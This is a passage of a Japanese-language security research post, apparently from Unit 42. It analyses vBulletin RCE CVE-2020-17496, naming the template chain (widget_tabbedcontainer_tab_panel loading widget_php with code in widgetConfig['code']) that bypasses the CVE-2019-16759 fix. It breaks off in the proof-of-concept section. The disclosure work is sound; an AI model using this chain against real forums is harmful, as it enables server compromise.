{"id":108703,"date":"2020-09-03T23:32:50","date_gmt":"2020-09-04T06:32:50","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=108703"},"modified":"2020-09-04T00:30:17","modified_gmt":"2020-09-04T07:30:17","slug":"cve-2020-17496","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/cve-2020-17496\/","title":{"rendered":"\u5b9f\u969b\u306e\u60aa\u7528\u304c\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308bvBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c(RCE)\u8106\u5f31\u6027CVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8"},"content":{"rendered":"<h2><strong>\u6982\u8981<\/strong><\/h2>\n<p>2019\u5e749\u6708\u306b\u3001\u4eba\u6c17\u30d5\u30a9\u30fc\u30e9\u30e0\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2vBulletin\u306b\u898b\u3064\u304b\u3063\u305f\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u8106\u5f31\u6027<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16759\">CVE-2019-16759<\/a>\u304c\u516c\u8868\u3055\u308c\u307e\u3057\u305f\u3002\u5f53\u6642\u306eUnit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f<a href=\"https:\/\/unit42.paloaltonetworks.jp\/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759\/\">\u5f53\u8a72vBulletin\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u30d6\u30ed\u30b0\u8a18\u4e8b<\/a>\u3092\u516c\u958b\u3057\u3001\u8106\u5f31\u6027\u306e\u6839\u672c\u7684\u8981\u56e0\u3068\u5b9f\u969b\u306b\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u3067\u898b\u3064\u304b\u3063\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u3064\u3044\u3066\u5206\u6790\u3057\u307e\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u304c\u60aa\u7528\u3055\u308c\u308b\u3068\u3001\u30d0\u30fc\u30b8\u30e7\u30f35.0.0\u304b\u30895.5.4\u307e\u3067\u306evBulletin\u3092\u3092\u5b9f\u884c\u3057\u3066\u3044\u308b\u30b5\u30fc\u30d0\u30fc\u3067\u653b\u6483\u8005\u306b\u7279\u6a29\u30a2\u30af\u30bb\u30b9\u3068\u5236\u5fa1\u3092\u53d6\u5f97\u3055\u308c\u3001\u7d44\u7e54\u304c\u81ea\u793e\u30b5\u30a4\u30c8\u304b\u3089\u7de0\u3081\u51fa\u3055\u308c\u3066\u3057\u307e\u3046\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p>\u6700\u8fd1\u3001Unit 42\u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u3001vBulletin\u306e\u4e8b\u524d\u8a8d\u8a3c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\uff08RCE\uff09\u8106\u5f31\u6027<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-17496\">CVE-2020-17496<\/a>\u3092\u5229\u7528\u3057\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u5f53\u8a72\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u4ee5\u524d\u306e\u8106\u5f31\u6027CVE-2019-16759\u306e\u4fee\u6b63\u3092\u56de\u907f\u3059\u308b\u3082\u306e\u3067\u3001\u653b\u6483\u8005\u304c\u6307\u5b9a\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3068\u60aa\u610f\u306e\u3042\u308bPHP\u30b3\u30fc\u30c9\u3092\u4f7f\u3044\u3001\u5de7\u5999\u306b\u7d30\u5de5\u3057\u305fHTTP\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u9001\u4fe1\u3059\u308b\u3053\u3068\u3067\u3001\u30ea\u30e2\u30fc\u30c8\u304b\u3089\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u8457\u540d\u4f01\u696d\u30fb\u7d44\u7e54\u306e\u30d5\u30a9\u30fc\u30e9\u30e0\u3092\u542b\u3081<a href=\"https:\/\/www.vbulletin.com\/\">10\u4e07\u4ef6\u4ee5\u4e0a\u306e\u30b5\u30a4\u30c8<\/a>\u304cvBulletin\u30d9\u30fc\u30b9\u3067\u69cb\u7bc9\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001\u305f\u3060\u3061\u306b\u30d1\u30c3\u30c1\u3092\u9069\u7528\u3059\u308b\u3053\u3068\u304c\u4e0d\u53ef\u6b20\u3067\u3059\u3002<\/p>\n<p>\u672c\u7a3f\u3067\u306f\u3001\u540c\u8106\u5f31\u6027\u306e\u30d1\u30c3\u30c1\u56de\u907f\u306b\u95a2\u3059\u308b\u8a73\u7d30\u3001\u8106\u5f31\u6027\u3092\u5b9f\u8a3c\u3059\u308b\u6982\u5ff5\u5b9f\u8a3c\u30b3\u30fc\u30c9\uff08PoC\uff09\u3001\u5b9f\u969b\u306b\u78ba\u8a8d\u3055\u308c\u3066\u3044\u308b\u653b\u6483\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u4e2d\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/secure-the-network\/subscriptions\/threat-prevention\">\u8105\u5a01\u9632\u5fa1<\/a>\u306e\u30b7\u30b0\u30cd\u30c1\u30e3\u3068\u95a2\u9023C2\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u30d6\u30ed\u30c3\u30af\u3059\u308b<a href=\"https:\/\/www.paloaltonetworks.jp\/products\/threat-detection-and-prevention\/web-security\">URL\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0<\/a>\u306e\u5404\u30b5\u30fc\u30d3\u30b9\u3001\u88fd\u54c1\u306b\u3088\u308a\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<h2><strong>\u8106\u5f31\u6027\u306e\u6839\u672c\u539f\u56e0\u5206\u6790\uff08CVE-2020-17496\uff09<\/strong><\/h2>\n<p>\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8 \u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u306f\u3001XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u306b\u5909\u63db\u3057\u3066\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308bvBulletin\u306e\u6a5f\u80fd\u3067\u3001\u30d0\u30fc\u30b8\u30e7\u30f35.0\u4ee5\u964d\u306evBulletin\u306f\u3001\u3053\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3068\u3057\u3066Ajax\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u53d7\u3051\u5165\u308c\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3092\u884c\u3046\u306e\u306f<span style=\"font-family: 'courier new', courier, monospace;\">staticRenderAjax<\/span>\u3068\u3044\u3046\u95a2\u6570\u3067\u3001\u56f31\u306b\u793a\u3059\u3088\u3046\u306b\u3001<span style=\"font-family: 'courier new', courier, monospace;\">staticRenderAjax<\/span>\u95a2\u6570\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u306e\u5024\u306f<span style=\"font-family: 'courier new', courier, monospace;\">$_REQUESTS<span style=\"font-family: georgia, palatino, serif;\">\u3001<\/span>$_GET<\/span>\u3001<span style=\"font-family: 'courier new', courier, monospace;\">$_POST<\/span>\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u3057\u305f\u304c\u3063\u3066\u3001\u3053\u308c\u3089\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u304b\u3089\u53d6\u5f97\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3068\u3001\u95a2\u9023\u306e\u8a2d\u5b9a\u5185\u5bb9\u306f\u30e6\u30fc\u30b6\u30fc\u306e\u5236\u5fa1\u4e0b\u306b\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u304c\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u8106\u5f31\u6027CVE-2019-16759\u306b\u3064\u306a\u304c\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108647\" aria-describedby=\"caption-attachment-108647\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108647 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-5.png\" alt=\"staticRenderAjax\u95a2\u6570\u306e\u5024\u3068\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u3001\u8d64\u3044\u77e2\u5370\u3067\u793a\u3059\u3088\u3046\u306b\u3001$_ REQUESTS\u3001$_ GET\u3001$_POST\u304b\u3089\u306e\u3082\u306e\u3067\u3059\u3002 \" width=\"900\" height=\"418\" \/><figcaption id=\"caption-attachment-108647\" class=\"wp-caption-text\">\u56f3 1 vBulletin 5.5.5 \u672a\u6e80\u306e callRender()<\/figcaption><\/figure>\n<p>\u3053\u3053\u3067\u653b\u6483\u8005\u304c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d<span style=\"font-family: 'courier new', courier, monospace;\">widget_php<\/span>\u3092\u542b\u3080Ajax\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u7d30\u5de5\u3092\u3057\u3001<span class=\"lang:php decode:true crayon-inline \">widgetConfig['code']<\/span>\u00a0\u30d1\u30e9\u30e1\u30fc\u30bf\u5185\u306b\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u914d\u7f6e\u3057\u305f\u5834\u5408\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0 \u30a8\u30f3\u30b8\u30f3\u306f\u305d\u306e<span style=\"font-family: 'courier new', courier, monospace;\">widget_php <\/span>XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u306e\u6587\u5b57\u5217\u306b\u5909\u63db\u3057\u307e\u3059\uff08\u56f32\u53c2\u7167)\u3002\u305d\u306e\u5f8c\u5909\u63db\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306f<span style=\"font-family: 'courier new', courier, monospace;\">eval<\/span>\u95a2\u6570\uff08\u56f33\u306b\u30cf\u30a4\u30e9\u30a4\u30c8\u8868\u793a)\u3092\u4ecb\u3057\u3066\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u751f\u6210\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306b\u306f<span class=\"lang:php decode:true crayon-inline \">vB5_Template_Runtime::evalPhp(\" . $widgetConfig['code'] . \")<\/span>\u00a0\u3068\u3044\u3046\u884c\u304c\u3042\u308b\u3053\u3068\u304b\u3089\u3001\u3053\u308c\u3067\u30ea\u30af\u30a8\u30b9\u30c8\u5185\u306e\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u3066\u3057\u307e\u3046\u3053\u3068\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_108649\" aria-describedby=\"caption-attachment-108649\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108649 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-6.png\" alt=\"\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540dwidget_php\u3068\u30d1\u30e9\u30e1\u30fc\u30bfwidgetConfig ['code']\u306b\u914d\u7f6e\u3055\u308c\u305f\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u3092\u542b\u3080Ajax\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u653b\u6483\u8005\u304c\u64cd\u4f5c\u3059\u308b\u3068\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u30a8\u30f3\u30b8\u30f3\u306fXML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8widget_php\u3092PHP\u30b3\u30fc\u30c9\u306e\u6587\u5b57\u5217\u306b\u5909\u63db\u3057\u307e\u3059\u3002\" width=\"900\" height=\"452\" \/><figcaption id=\"caption-attachment-108649\" class=\"wp-caption-text\">\u56f3 2 widget_php\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/figcaption><\/figure>\n<pre class=\"lang:php decode:true \">$final_rendered = \" . \";\r\n\r\nif (empty($widgetConfig) AND !empty($widgetinstanceid))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \"; $widgetConfig = vB5_Template_Runtime::parseData('widget', 'fetchConfig', $widgetinstanceid);\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\nelse {\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ' . \";\r\n\r\nif (!empty($widgetConfig))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \";\r\n\r\n$widgetid = $widgetConfig['widgetid'];\r\n\r\n$final_rendered .= \" . ' ' . \";\r\n\r\n$widgetinstanceid = $widgetConfig['widgetinstanceid'];\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ' . vB5_Template_Runtime::includeTemplate('module_title',array('widgetConfig' =&gt; $widgetConfig, 'show_title_divider' =&gt; 'l', 'can_use_sitebuilder' =&gt; $user['can_use_sitebuilder'])) . ' ' . \";\r\n\r\nif (!empty($widgetConfig['code']) AND !vB::getDatastore()-&gt;getOption('disable_php_rendering'))\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \" . ' ' . vB5_Template_Runtime::evalPhp(\" . $widgetConfig['code'] . \") . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . \";\r\n\r\nif ($user['can_use_sitebuilder'])\r\n\r\n{ $final_rendered .= ' ' . vB5_Template_Runtime::parsePhrase(\"click_edit_to_config_module\") . ' ';\r\n\r\n}\r\n\r\nelse\r\n\r\n{\r\n\r\n$final_rendered .= \";\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ';\r\n\r\n}\r\n\r\n$final_rendered .= \" . ' ';<\/pre>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_108651\" aria-describedby=\"caption-attachment-108651\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108651 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-7.png\" alt=\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u3067\u95a2\u6570eval($templateCode)\u3092\u30cf\u30a4\u30e9\u30a4\u30c8\u8868\u793a\u3057\u3066\u3044\u307e\u3059\" width=\"900\" height=\"529\" \/><figcaption id=\"caption-attachment-108651\" class=\"wp-caption-text\">\u56f3 3 XML\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3092eval\u95a2\u6570\u3067\u8a55\u4fa1\u3057\u3066\u3044\u308b<\/figcaption><\/figure>\n<p>\u30d0\u30fc\u30b8\u30e7\u30f35.5.5\u4ee5\u964d\u3001CVE-2019-16759\u306e\u4fee\u6b63\u304c<span style=\"font-family: 'courier new', courier, monospace;\">callRender()<\/span>\u95a2\u6570\u306b\u5c0e\u5165\u3055\u308c\u307e\u3057\u305f\uff08\u56f34\u53c2\u7167\uff09\u3002\u3053\u306e\u4fee\u6b63\u3067\u306f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u306e\u306b\u7981\u6b62\u30ea\u30b9\u30c8\u306e\u3057\u304f\u307f\u3092\u5229\u7528\u3057\u3066\u3044\u3066\u3001\u540d\u524d\u304c<span style=\"font-family: 'courier new', courier, monospace;\">widget_php<\/span>\u3067\u3042\u308c\u3070XML\u30a8\u30f3\u30b8\u30f3\u306f\u30ea\u30af\u30a8\u30b9\u30c8\u3055\u308c\u305f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3057\u307e\u305b\u3093\u3002<\/p>\n<figure id=\"attachment_108653\" aria-describedby=\"caption-attachment-108653\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108653 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-8.png\" alt=\"\u30d0\u30fc\u30b8\u30e7\u30f35.5.5\u4ee5\u964d\u3001CVE-2019-16759\u306e\u4fee\u6b63\u304c&lt;s0&gt;callRender()&lt;\/s0&gt;\u95a2\u6570\u306b\u5c0e\u5165\u3055\u308c\u307e\u3057\u305f\uff08\u56f34\u53c2\u7167\uff09\u3002\" width=\"900\" height=\"932\" \/><figcaption id=\"caption-attachment-108653\" class=\"wp-caption-text\">\u56f3 4 vBulletin 5.5.5 \u4ee5\u964d\u306e callRender()<\/figcaption><\/figure>\n<p>\u3053\u308c\u3068\u306f\u5225\u306e\u4fee\u6b63\u3082\u3042\u308a\u3001\u305d\u3061\u3089\u306e\u4fee\u6b63\u3067\u306fevalPhp\u95a2\u6570\u304c\u73fe\u5728\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u3088\u3046\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u3061\u3089\u306e\u4fee\u6b63\u3067\u3001<span style=\"font-family: 'courier new', courier, monospace;\">widget_php<\/span>\u304cPHP\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u4f7f\u7528\u3067\u304d\u308b\u552f\u4e00\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u306a\u308a\u307e\u3057\u305f\uff08\u56f35\u53c2\u7167\uff09\u3002<\/p>\n<figure id=\"attachment_108655\" aria-describedby=\"caption-attachment-108655\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108655 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-9.png\" alt=\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u5185\u306e\u30b3\u30fc\u30c9\u306f\u3001if (self::currentTemplate() != 'widget_php') \u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u3067evalPhp\u95a2\u6570\u304c\u73fe\u5728\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u3044\u308b\u3088\u3046\u3059\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002 \" width=\"900\" height=\"354\" \/><figcaption id=\"caption-attachment-108655\" class=\"wp-caption-text\">\u56f3 5 evalPhp() \u304c\u30b3\u30fc\u30c9\u3092\u5b9f\u884c\u3059\u308b\u306e\u306f\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304c widget_php \u306e\u5834\u5408\u306e\u307f<\/figcaption><\/figure>\n<p>\u5148\u306e<span style=\"font-family: 'courier new', courier, monospace;\">widget_php<\/span>\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3078\u306e\u30e6\u30fc\u30b6\u30fc\u30a2\u30af\u30bb\u30b9\u5236\u9650\u306b\u304f\u308f\u3048\u3001\u3053\u306e\u4fee\u6b63\u3067\u306f\u540c\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092PHP\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u5229\u7528\u3067\u304d\u308b\u552f\u4e00\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3068\u3053\u308d\u304c\u3001\u76f4\u8fd1\u3067\u898b\u3064\u304b\u3063\u305f\u4fee\u6b63\u56de\u907f\u65b9\u6cd5\u3067\u306f\u3001\u5225\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u4f7f\u7528\u3059\u308c\u3070\u3053\u306ewidget_php\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ed\u30fc\u30c9\u3067\u304d\u3066\u3057\u307e\u3046\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u3002\u305d\u306e\u5225\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3068\u3044\u3046\u306e\u304c<span style=\"font-family: 'courier new', courier, monospace;\">widget_tabbedcontainer_tab_panel<\/span>\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_108657\" aria-describedby=\"caption-attachment-108657\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108657 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-10.png\" alt=\"This shows code from the template widget_tabbedcontainer_tab_panel, which can be utilitzed to load widget_php\" width=\"900\" height=\"342\" \/><figcaption id=\"caption-attachment-108657\" class=\"wp-caption-text\">\u56f3 6 widget_tabbedcontainer_tab_panel \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/figcaption><\/figure>\n<p>\u4e0a\u306e\u56f36\u306b\u793a\u3059\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<span style=\"font-family: 'courier new', courier, monospace;\">widget_tabbedcontainer_tab_panel<\/span>\u3092\u4f7f\u3048\u3070\u3001\u8907\u6570\u306e\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u81ea\u4f53\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3057\u3066\u3082\u76f4\u63a5\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u306b\u3064\u306a\u304c\u308b\u308f\u3051\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u304c\u3001\u3053\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3059\u308b\u3068\u3001\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306e\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u304c\u30c8\u30ea\u30ac\u30fc\u3055\u308c\u307e\u3059\u3002<\/p>\n<p>\u4ee5\u4e0b\u306e\u30b3\u30fc\u30c9\u306fXML\u5185\u306e<span style=\"font-family: 'courier new', courier, monospace;\">widget_tabbedcontainer_tab_panel<\/span>\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304b\u3089\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u3055\u308c\u305fPHP\u30b3\u30fc\u30c9\u3067\u3059\u3002\u30b3\u30fc\u30c9\u306f\u751f\u6210\u5f8c\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:php decode:true \">$final_rendered = \" . \";\r\n\r\n$panel_id = \" . vB5_Template_Runtime::vBVar($id_prefix).vB5_Template_Runtime::vBVar($tab_num) . \";\r\n\r\n$final_rendered .= \" . \" . \" . ' ' . \";\r\n\r\nif (isset($subWidgets) AND (is_array($subWidgets) OR $subWidgets instanceof ArrayAccess))\r\n\r\n{\r\n\r\nforeach ($subWidgets AS $subWidget)\r\n\r\n{\r\n\r\n$final_rendered .= ' ' . vB5_Template_Runtime::includeTemplate($subWidget['template'],array('widgetConfig' =&gt; $subWidget['config'], 'widgetinstanceid' =&gt; $subWidget['widgetinstanceid'], 'widgettitle' =&gt; $subWidget['title'], 'tabbedContainerSubModules' =&gt; $subWidget['tabbedContainerSubModules'], 'product' =&gt; $subWidget['product'])) . ' ';\r\n\r\n}\r\n\r\n}$final_rendered .= \" . '';<\/pre>\n<p>\u3053\u306ePHP\u30b3\u30fc\u30c9\u3067\u306f\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u30a8\u30f3\u30b8\u30f3\u304c<span style=\"font-family: 'courier new', courier, monospace;\">$subWidgets<\/span>\u304b\u3089\u300csubWidget\u300d\u3068\u305d\u306e\u8a2d\u5b9a\u3092\u30c8\u30e9\u30d0\u30fc\u30b9\u3057\u3066\u65b0\u3057\u3044\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30ec\u30f3\u30c0\u30ea\u30f3\u30b0\u306b\u3088\u308aPHP\u30b3\u30fc\u30c9\u304c\u751f\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u4f8b\u3067\u306f\u6587\u5b57\u5217<span style=\"font-family: 'courier new', courier, monospace;\">widget_php<\/span>\u304c<span style=\"font-family: 'courier new', courier, monospace;\">subWidget<\/span>\u5909\u6570\u306b\u5272\u308a\u5f53\u3066\u3089\u308c\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c<span class=\"lang:php decode:true crayon-inline\">$widgetConfig['code']<\/span>\u00a0\u306b\u914d\u7f6e\u3055\u308c\u3066\u3044\u3066\u3001\u3053\u308c\u304cCVE-2019-16759\u3068\u540c\u69d8\u306b\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<h2><strong>PoC\uff08\u6982\u5ff5\u5b9f\u8a3c\u30b3\u30fc\u30c9\uff09<\/strong><\/h2>\n<p>\u4ee5\u4e0a\u306e\u5206\u6790\u304b\u3089\u3001\u5b9f\u969b\u306b\u6a5f\u80fd\u3059\u308b\u3053\u3068\u3092\u8a3c\u660e\u3059\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30b3\u30fc\u30c9\u3092\u4f5c\u6210\u3067\u304d\u307e\u3059\u3002<span style=\"font-family: 'courier new', courier, monospace;\">callRender<\/span>\u95a2\u6570\u306e\u547c\u3073\u51fa\u3057\u306b\u306f\u3001POST HTTP\u30e1\u30bd\u30c3\u30c9\u304c\u5fc5\u8981\u3067\u3059\uff08\u56f37\u53c2\u7167\uff09\u3002<\/p>\n<figure id=\"attachment_108659\" aria-describedby=\"caption-attachment-108659\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-108659 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2020\/09\/word-image-11.png\" alt=\"\u8d64\u3044\u30dc\u30c3\u30af\u30b9\u3067\u5f37\u8abf\u8868\u793a\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u306f\u3001\u95a2\u6570callRender\u3092\u547c\u3073\u51fa\u3059\u305f\u3081\u306bPOST HTTP\u30e1\u30bd\u30c3\u30c9\u304c\u3069\u306e\u3088\u3046\u306b\u5fc5\u8981\u304b\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306fCVE-2020-17496\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u6982\u5ff5\u5b9f\u8a3c\u306e\u4e00\u90e8\u3067\u3059\u3002\" width=\"900\" height=\"465\" \/><figcaption id=\"caption-attachment-108659\" class=\"wp-caption-text\">\u56f3 7 callRender()\u306e\u547c\u3073\u51fa\u3057<\/figcaption><\/figure>\n<p>\u56f38\u306f<span style=\"font-family: 'courier new', courier, monospace;\">phpinfo()<\/span>\u30b3\u30fc\u30c9\u306e\u5b9f\u884c\u7d50\u679c\u3092\u542b\u3080\u4fb5\u5bb3\u3055\u308c\u305f\u30da\u30fc\u30b8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\uff08\u30ea\u30af\u30a8\u30b9\u30c8\u60c5\u5831\u3042\u308a\uff09\u3002\u56f39\u3068\u56f310\u3082\u305d\u308c\u3068\u306f\u307e\u305f\u5225\u306e\u7d30\u5de5\u6e08\u307f\u30ea\u30af\u30a8\u30b9\u30c8\u3092\u5b9f\u884c\u3057\u305f\u5834\u5408\u306b\u540c\u3058\u52b9\u679c\u304c\u5f97\u3089\u308c\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>URL\u3067\u306f\u3001\u5b50\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u540d<span style=\"font-family: 'courier new', courier, 